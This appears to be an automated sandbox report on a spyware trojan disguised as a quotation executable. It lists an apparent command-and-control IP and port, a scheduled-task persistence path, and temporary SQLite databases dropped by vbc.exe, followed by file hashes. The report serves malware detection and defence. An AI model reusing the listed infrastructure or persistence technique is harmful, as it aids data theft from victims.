                                                        185.222.58.90
                                                        		unknownNetherlands
                                                        		51447ROOTLAYERNETNLfalse

                                                        General Information

                                                        Joe Sandbox Version:35.0.0 Citrine
                                                        Analysis ID:647019
                                                        Start date and time: 16/06/202214:41:162022-06-16 14:41:16 +02:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 10m 58s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:QUOTATION 061622.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:35
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@25/40@4/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HDC Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 97%
                                                        • Number of executed functions: 146
                                                        • Number of non-executed functions: 1
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Adjust boot time
                                                        • Enable AMSI

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        14:42:54Task SchedulerRun new task: Nafifas path: "C:\Users\user\AppData\Roaming\Data\Data.exe"
                                                        14:43:15API Interceptor175x Sleep call for process: vbc.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        185.222.58.90SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exeGet hashmaliciousBrowse
                                                        • 185.222.58.90:17910/
                                                        RFQ - FYKS - 06052022.exeGet hashmaliciousBrowse
                                                        • 185.222.58.90:17910/
                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                        • 185.222.58.90:17910/
                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                        • 185.222.58.90:17910/

                                                        Domains

                                                        No context

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        ROOTLAYERNETNLvbc.exeGet hashmaliciousBrowse
                                                        • 185.222.57.197
                                                        SOA.exeGet hashmaliciousBrowse
                                                        • 185.222.57.146
                                                        0123987INMWN2987.jsGet hashmaliciousBrowse
                                                        • 45.137.22.152
                                                        L4aghbwCQr54nW4.exeGet hashmaliciousBrowse
                                                        • 45.137.22.152
                                                        Order Enquiry.exeGet hashmaliciousBrowse
                                                        • 185.222.57.173
                                                        Quotation.exeGet hashmaliciousBrowse
                                                        • 45.137.22.40
                                                        CCMWZuN3YWHECys.exeGet hashmaliciousBrowse
                                                        • 45.137.22.152
                                                        SecuriteInfo.com.Trojan005944781.27289.exeGet hashmaliciousBrowse
                                                        • 185.222.57.197
                                                        vqalfhePHx.exeGet hashmaliciousBrowse
                                                        • 45.137.22.237
                                                        PyS0mctVfI.exeGet hashmaliciousBrowse
                                                        • 45.137.22.237
                                                        Yeni sipari#U015f _No.129099, pdf.exeGet hashmaliciousBrowse
                                                        • 185.222.57.197
                                                        ldzOp71fAH.exeGet hashmaliciousBrowse
                                                        • 185.222.57.197
                                                        INV198763.jsGet hashmaliciousBrowse
                                                        • 45.137.22.152
                                                        LR7AKSMQhc.exeGet hashmaliciousBrowse
                                                        • 45.137.22.237
                                                        Quotation.exeGet hashmaliciousBrowse
                                                        • 45.137.22.40
                                                        INVZ678765340.jsGet hashmaliciousBrowse
                                                        • 45.137.22.72
                                                        Bestellung -20162022 _June 2022,pdf.exeGet hashmaliciousBrowse
                                                        • 185.222.57.197
                                                        Updated PI.exeGet hashmaliciousBrowse
                                                        • 185.222.57.146
                                                        iOW5Sp6ul4.exeGet hashmaliciousBrowse
                                                        • 185.222.57.197
                                                        rNgmoGJFYX.exeGet hashmaliciousBrowse
                                                        • 185.222.57.91

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Data.exe.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):520
                                                        Entropy (8bit):5.345981753770044
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
                                                        MD5:CB16F02E4CEFD4F305114A67B4865184
                                                        SHA1:7A481FAE100B554EB754816608A7776954863CFF
                                                        SHA-256:0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
                                                        SHA-512:1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION 061622.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QUOTATION 061622.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):520
                                                        Entropy (8bit):5.345981753770044
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
                                                        MD5:CB16F02E4CEFD4F305114A67B4865184
                                                        SHA1:7A481FAE100B554EB754816608A7776954863CFF
                                                        SHA-256:0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
                                                        SHA-512:1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2502
                                                        Entropy (8bit):5.3347050065951125
                                                        Encrypted:false
                                                        SSDEEP:48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHDJHjHKoLK:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo6d
                                                        MD5:44A99103902115000FEE31833EEF1EC7
                                                        SHA1:8A5D9F44EEDDB720DA442547F396ED61378DC5CF
                                                        SHA-256:E1CDCE73432C1A13E0C2C29AA9DD3282DC9C6CC07262AEFEFBC0BC0BF13A7039
                                                        SHA-512:89C217C56022C88F94B813A81E83800B9D5D4779364E1E40D3C892100AEBAC9ACA75F9E767B6C003D88399A462830FE6973F7D611595ADFAAEBE8D39723A37F0
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                        C:\Users\user\AppData\Local\Temp\tmp21C5.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp243C.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2D4F.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2EB7.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2F83.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp30DC.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp31D7.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp32A3.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp4B03.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.698618937757839
                                                        Encrypted:false
                                                        SSDEEP:12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
                                                        MD5:FBFB8162B9366F7135B54193D54C2094
                                                        SHA1:9F7291EB4E117104EE4215B83F38C18607438B02
                                                        SHA-256:D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
                                                        SHA-512:452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
                                                        Malicious:false
                                                        Preview:IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

                                                        C:\Users\user\AppData\Local\Temp\tmp4C32.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp57A8.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5901.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5B92.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5CBC.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5E24.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
